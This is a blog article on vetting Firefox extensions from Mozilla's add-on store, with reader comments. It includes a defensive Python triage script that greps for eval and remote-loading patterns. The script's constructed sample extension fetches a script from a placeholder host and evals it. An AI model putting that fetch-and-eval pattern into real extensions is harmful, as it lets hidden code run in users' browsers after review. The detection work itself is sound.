How to stay safe when downloading Firefox extensions

Martin Brinkmann
Jan 16, 2018
Firefox, Firefox add-ons

The following guide offers tips and instructions for staying safe when you download extensions for the Mozilla Firefox web browser.

The past year has been eventful for users of the Firefox web browser. Mozilla introduced features such as multi-process support and Firefox Quantum that moved the browser closer to the all-powerful Google Chrome browser.

Mozilla dropped the old add-on system of Firefox and replaced it with WebExtensions. WebExtensions is the same system that Google Chrome and other Chromium-based browsers support. Mozilla's plan was, however, to extend the capabilities of WebExtensions further than what Chrome supported.

Firefox WebExtensions have access to features that can make them more potent than their Chrome counterparts.

One of the reasons that Mozilla offered for switching to WebExtensions was that classic add-ons had too much control over the browser. WebExtensions limit what developers can do, which benefits the security and stability of the browser.

A look at Chrome's Web Store shows, however, that WebExtensions can still be abused to spy on users, steal data, or misuse user devices in other ways. The restricted API reduces what a malicious extension can reach, but it does not stop an extension from exfiltrating the page content and browsing data that its declared permissions already grant it.

Staying safe when downloading Firefox add-ons


AMO, Add-ons Mozilla Org, is the primary hub for Firefox extensions. It is the official extension directory, and users may use it to browse, search for and install browser extensions.

The store lists classic add-ons and WebExtensions currently. Mozilla announced plans in 2017 to remove traditional add-ons from the Store after Firefox ESR hits version 60. Firefox ESR is the only official Firefox version right now that supports legacy add-ons. The next version of the extended support release will end that.

Automatic and manual approval of extensions


Mozilla changed the extension submission system on AMO. In the past, the organization verified each add-on manually before allowing it to become available on AMO. The new system runs automated checks and publishes any extension that passes them to the store immediately.

This is the same model that Google uses for Chrome extensions. Mozilla will still check add-ons manually, but only after the fact, once they are already available to users. That post-publication review is something Google does not do, and it does improve security, but it also means there is a window during which an unreviewed extension can be installed by anyone.

There is no manual verification indicator on the site right now which means that you don't know if an extension was reviewed manually.

Crypto-mining extensions have already slipped past the automatic review process, and while the situation is arguably a lot better than on Chrome's Web Store, there is a chance that problematic extensions may end up on AMO.

So, what can you do about it?

  • If you have the skills, verify extensions yourself. Download the extension to your local system, extract the XPI file (it is a ZIP archive), and go through the code, starting with the manifest and any script that executes code it did not ship with.

If you cannot do that, you may use the following methods to reduce the chance of installing problematic extensions:

  • Don't install extensions directly when they are made available. You increase the likelihood that an extension was reviewed by Mozilla if you wait a couple of days.
  • Check the permissions. Do they match the purpose of the extension?
  • Read the user reviews and check the general stats (rating, number of users, add-on history). Extensions with good ratings, lots of installs and good reviews are a safer bet than extensions with no reviews, no ratings, and no comments. This is not a 100% safeguard either: attackers have taken over the Google accounts of Chrome extension developers in the past and used them to upload manipulated new versions of trusted extensions to the Store, so an extension's reputation is only as good as its developer's account security.
  • Check the developer profile. Developers who maintain multiple extensions and have maintained them for a long time are generally more trustworthy than a profile created last week with a single upload.
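The two checks above that can be done on the file itself, extracting the XPI and reading the code, and comparing the declared permissions with the extension's purpose, can be scripted as a first pass before a manual read. The following is an added example written for this article; it is not code from the article, from Mozilla or from AMO. It assumes a WebExtension-style package whose entry point is manifest.json (legacy XUL add-ons use install.rdf and are not handled). The sample XPI it builds in memory is constructed for the demonstration, and the list of "sensitive" permissions and the source patterns it greps for are this example's own heuristics, not an AMO policy list.

```python
"""Offline triage of a Firefox WebExtension package (.xpi).

An .xpi is a ZIP archive. This script reads manifest.json, lists the
declared permissions, flags broad or sensitive ones, and greps the
bundled JavaScript for patterns that merit a closer manual read
(dynamic code execution, remote script loading, long opaque strings).
It is a triage aid, not a verdict: a match is a lead, not proof.
"""
import io
import json
import re
import zipfile

# Permissions that give an extension reach far beyond a typical
# single-purpose add-on. This set is the example's judgement call.
SENSITIVE_PERMISSIONS = {
    "<all_urls>", "*://*/*", "http://*/*", "https://*/*",
    "tabs", "history", "cookies", "webRequest", "webRequestBlocking",
    "nativeMessaging", "downloads", "clipboardRead", "management",
    "proxy", "privacy",
}

# Source patterns worth a manual look (example heuristics).
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "new_function": re.compile(r"\bnew\s+Function\s*\("),
    "remote_script": re.compile(r"""createElement\s*\(\s*['"]script['"]"""),
    "remote_fetch": re.compile(r"\b(?:fetch|XMLHttpRequest|importScripts)\b.*https?://", re.I),
    "long_opaque_string": re.compile(r"""['"][A-Za-z0-9+/=]{200,}['"]"""),
    "char_code_decoding": re.compile(r"String\.fromCharCode|unescape\s*\("),
}


def analyze_xpi(data: bytes) -> dict:
    """Return a report dict for the XPI bytes in `data`."""
    report = {"permissions": [], "sensitive_permissions": [],
              "files": [], "code_findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        report["files"] = names
        if "manifest.json" not in names:
            report["error"] = "no manifest.json: not a WebExtension package"
            return report
        manifest = json.loads(zf.read("manifest.json").decode("utf-8-sig"))
        perms = list(manifest.get("permissions", []))
        perms += list(manifest.get("optional_permissions", []))
        # content_scripts match patterns are host access too, even though
        # they are not listed under "permissions".
        for cs in manifest.get("content_scripts", []):
            perms.extend(cs.get("matches", []))
        report["permissions"] = perms
        report["sensitive_permissions"] = sorted(
            {p for p in perms if p in SENSITIVE_PERMISSIONS})
        for name in names:
            if not name.endswith(".js"):
                continue
            try:
                src = zf.read(name).decode("utf-8")
            except UnicodeDecodeError:
                # A script that is not valid UTF-8 deserves a look in itself.
                report["code_findings"].append((name, "non_utf8_js", 0))
                continue
            for label, pat in SUSPICIOUS_PATTERNS.items():
                for m in pat.finditer(src):
                    line_no = src.count("\n", 0, m.start()) + 1
                    report["code_findings"].append((name, label, line_no))
    return report


def build_sample_xpi() -> bytes:
    """Constructed sample: a 'word counter' asking for far more than it needs."""
    manifest = {
        "manifest_version": 2,
        "name": "Word Counter (constructed sample)",
        "version": "1.0",
        "permissions": ["<all_urls>", "tabs", "cookies", "storage"],
        "background": {"scripts": ["background.js"]},
        "content_scripts": [{"matches": ["*://*/*"], "js": ["content.js"]}],
    }
    background_js = (
        "// constructed sample, not a real extension\n"
        "fetch('https://updates.example.invalid/payload.js')\n"
        "  .then(r => r.text())\n"
        "  .then(code => eval(code));\n"
    )
    content_js = "document.body.innerText.split(/\\s+/).length;\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("background.js", background_js)
        zf.writestr("content.js", content_js)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Pass a downloaded .xpi path to triage it; with no argument, run the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xpi()
    print(json.dumps(analyze_xpi(data), indent=2))
```

Run it against a downloaded .xpi (`python triage_xpi.py some-extension.xpi`). For the constructed sample, the report shows that a word counter declares `<all_urls>`, `tabs` and `cookies`, and that background.js fetches a script from a remote host and passes it to `eval`, which is exactly the pattern that lets a developer change what an already-reviewed extension does after installation. A clean report is not a clearance: the patterns are a starting point for the manual read, and obfuscated or minified code will need to be beautified first.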

Closing Words

Don't get me wrong: I'm not advocating that Firefox users stop installing add-ons. Firefox users do need to be aware of the weaknesses of the new review system, and it is easy enough to see how bad things can get by looking at the situation on Chrome's Web Store. Mozilla's system is still better than Google's, but the organization should consider adding a visible flag to extensions that have not yet been reviewed manually.

Now You: How do you handle this?


Comments

  1. Anonymous said on January 18, 2018 at 6:09 pm

    So far the trend is:

    – 75% add-ons are manually reviewed within 5 days of submission
    – 5% add-ons are manually reviewed between 5 and 10 days of submission
    – The rest lags a bit (e.g. big updates or new add-ons that are pretty complex)

  2. Tau said on January 18, 2018 at 6:07 pm

    Setting the mobile version as default (and its horrid design) says much about the trend. Automatic checks are absolutely a bad idea; the Play Store and the Chrome repo are ridden with trashware and worse. Hopefully the human verification process won't take too much time. When the last good sane ESR version goes out of support it'll be a hassle to change browser.

  3. aaronfalls said on January 18, 2018 at 2:25 am

    You can view the sources of addons from within Firefox by using https://addons.mozilla.org/en-US/firefox/addon/crxviewer/

    It has built-in unpackers, js beautify and color highlighting, so it's my preferred choice to view source; the thing is you have to trust this add-on developer, which is hard for the tin foil hats.

  4. Jozsef said on January 17, 2018 at 9:43 am

    My short term solution is not to use any new extensions. The new policy of not doing manual checks shows that Mozilla’s management is completely illogical and irrational since it so completely contradicts their stated goal of protecting their users’ privacy and security as a very high priority. Either that or they really have a different set of goals that I can’t comprehend. It really seems like a rudderless ship which is so heartbreaking as I’ve used FF since it was separated from Mozilla Suite and called Phoenix.

    @dark Yes, open source is always reassuring once there has been a bit of time to check the code.

  5. dark said on January 16, 2018 at 7:33 pm

    The first thing i do is google if the addon is open source or not, i don’t use closed source addons.

  6. Sophie said on January 16, 2018 at 7:31 pm

    It does seem to me, to be absolutely mad that this process is now automated, giving rise to the possibility of the issues or problems that you describe, with regard to Addons.

    I thought that one of the fundamental reasons for these changes from Mozilla, was to make the environment safer, not less safe?

    Really this seems crazy to me, unless I’m missing something.

    1. John Fenderson said on January 16, 2018 at 8:47 pm

      “I thought that one of the fundamental reasons for these changes from Mozilla, was to make the environment safer, not less safe?”

      Technically, the fundamental reason for the change was to free Mozilla devs to be able to make deep changes to the engine that would have been impossible while retaining backward compatibility.

      That said, they do, in fact, make extensions safer — because extensions have been neutered and simply don’t have the free access to the browser that they did with XUL. However, “safer” doesn’t mean “safe” in an absolute sense.

  7. Sophie said on January 16, 2018 at 7:24 pm

    Sorry for my ignorance, but does anyone know if Waterfox will be continuing (somehow) legacy addons? Hosting them…and completely porting them to a new home?

    Will it be, do you think, that when ESR hits v60, [and if at that point traditional addons are removed]….will there be no other source to search for them and install them into legacy Firefox?

    I plan to keep legacy FF going for quite a while yet, while also using Quantum. Perhaps at some point I’ll make the leap, but like so many others, my old addons are still working nice, and do things that I can’t do in Quantum onwards.

    1. John Fenderson said on January 16, 2018 at 8:42 pm

      “does anyone know if Waterfox will be continuing (somehow) legacy addons?”

      That’s their stated intentions, but who knows what the future will bring? Fortunately, AMO is not required to install extensions, it’s just a convenience.

  8. Ron said on January 16, 2018 at 5:40 pm

    >>One of the reasons that Mozilla offered for switching to WebExtensions was that classic add-ons had too much control over the browser. <<

    Change "classic add-ons" to users, and that's what Mozilla really meant. That's why I won't ever use FF as my main browser anymore.

    Switch to either Pale Moon, Waterfox, or Basilisk is my advice.

  9. dani said on January 16, 2018 at 1:24 pm

    The permission granularity is not very good. Even small operations require the WebExtension to ask for very extensive permissions. So users who install a small add-on might wonder why such a simple add-on requires so many permissions, not understanding that the add-on developer had no choice but to ask for them.

  10. Anonymous said on January 16, 2018 at 1:21 pm

    If AMO thinks you’re using 52, then you likely have the “privacy.resistFingerprinting” pref set to true – that’s not Mozilla’s fault.

    The purpose of that setting is to make sure your browser doesn't appear unique, and so it spoofs the version number of the current ESR version.

  11. SCBright said on January 16, 2018 at 1:15 pm

    AMO is falling into the same garbage dump as the Chrome Store is…
    Rather than promoting continuous improvement, it is promoting the continuous worsening

  12. vosie said on January 16, 2018 at 1:14 pm

    >>”Mozilla dropped the old add-on system of Firefox and replaced it with WebExtensions. WebExtensions is the same system that Google Chrome and other Chromium-based browsers support.”

    In other words Mozilla wanted to make Chrome add-ons usable in Firefox, in the hope that it would increase Firefox's market share. This wasn't a bad idea. The bad idea was dropping support for old XUL / XPCOM add-ons. Mozilla should have kept compatibility with both kinds of add-ons.

    >>”Firefox WebExtensions have access to features that can make them more potent than their Chrome counterparts.”

    This is the argument that Mozilla use to defend WebExtensions. But it’s a pathetic argument, because it doesn’t matter. The addon developers will not implement extra features in the Firefox version of their addons, because they want to keep consistency with the Chrome version. And WebExtensions is much worse and much more limited than classic (XUL/XPCOM) addons.

    >>”One of the reasons that Mozilla offered for switching to WebExtensions was that classic add-ons had too much control over the browser. WebExtensions limit what developers can do which benefits security and stability of the browser.”

    This proves how idiotic Mozilla is. Classic add-ons are more powerful. That's the exact reason why classic add-ons are much better than the junk WebExtensions! And they mandatorily used the "security and stability" marketing keywords as an argument to brainwash people so they justify/accept the removal of classic add-ons... Mozilla is pathetic.

    Firefox 57+ = Google Chrome Clone

    1. Paul's dad. said on January 17, 2018 at 1:05 pm

      The murder of classic addons has been going on since Firefox 5.0, when the rapid release cycle was introduced. It was already a pain to keep add-ons updated before 5.0, since then, extension developers have been consistently driven off by Mozilla, and Firefox has consistently lost market share.

      The writing was on the wall since then, and now it’s come.
      I’ve been using Firefox since version 1.0, and now I’m using Vivaldi. If I’m gonna have crappy javascript-widgets-as-extensions, I might as well get the Chrome extensions while I’m at it, because there’s more choice and they’re better maintained. And Vivaldi gives me more customization than Firefox Quantum, and I’m frankly enjoying it quite a lot, despite its quirks.

      Nothing will ever be as good and stable as Firefox was with XUL extensions and single-process though. It’s just feasible.

    2. jan said on January 16, 2018 at 9:21 pm

      I agree with vosie.
      It soon will be resolved when Firefox will go up in vapor

  13. Anonymous said on January 16, 2018 at 12:59 pm

    On the Pale Moon’s add-ons page we have not that kind of dilemmas. All is safe there.

  14. pd said on January 16, 2018 at 12:16 pm

    AMO thinks my browser is version 52. It’s actually 57.0.4

    It’s bad enough that they’ve butchered the addons system in 57+ but when poor volunteer add on devs re-write their code, if Mozilla can be bothered providing APIs, and make them available, yet the AMO store gets Firefox version detection wrong, geez.

    1. jan said on January 16, 2018 at 9:16 pm

      Hi pd,

      I can understand your frustration; and I also think it is a very poor approach to throw the release version back to an earlier release when you disable something. It is a lousy programmer's approach instead of doing it properly.
      Therefore, when you install 57 you got 57 I would say. If you disable something in 57 you still have 57. It is by coincidence that 57 minus "something" equals version 52.

      In that context the impolite remark made by Pants is not appropriate.

      1. Anonymous said on January 19, 2018 at 1:22 am

        You know nothing, John Snow, fingerprinting resistance is spoofing Firefox ESR, that's why version 52 appears as expected. Your impolite remark towards programmers is not appropriate.

    2. M said on January 16, 2018 at 12:56 pm

      Check the resist.fingerprinting preference in about:config, it makes FF appear as 52. If you want to keep that enabled you can still download the xpi files and install them manually.

    3. Fx0 said on January 16, 2018 at 12:53 pm

      The version detection on AMO works, but it depends on your user-agent, of course. If AMO thinks you’re using Firefox 52 then your user-agent tells AMO exactly that. One reason can be privacy.resistFingerprinting => true, this preference sets your user-agent to Firefox 52.

    4. Pants said on January 16, 2018 at 12:39 pm

      This is because you have decided to go into about:config and change privacy.resistFingerprinting to true. There is no UI for this setting, and the default is false. Before you change things you should at least try to understand them, instead of throwing accusations. Mozilla have deliberately not exposed this as there are still a few issues.

      Here is a handy list of all the things RFP does and outstanding issues to do with some of the patches, and things still to come: https://github.com/ghacksuserjs/ghacks-user.js/issues/7

  15. Appster said on January 16, 2018 at 10:59 am

    This is the first thing to do, absolutely:

    Read the reviews of the extension you want to download! They are the most informative aspect in 99% of all cases.
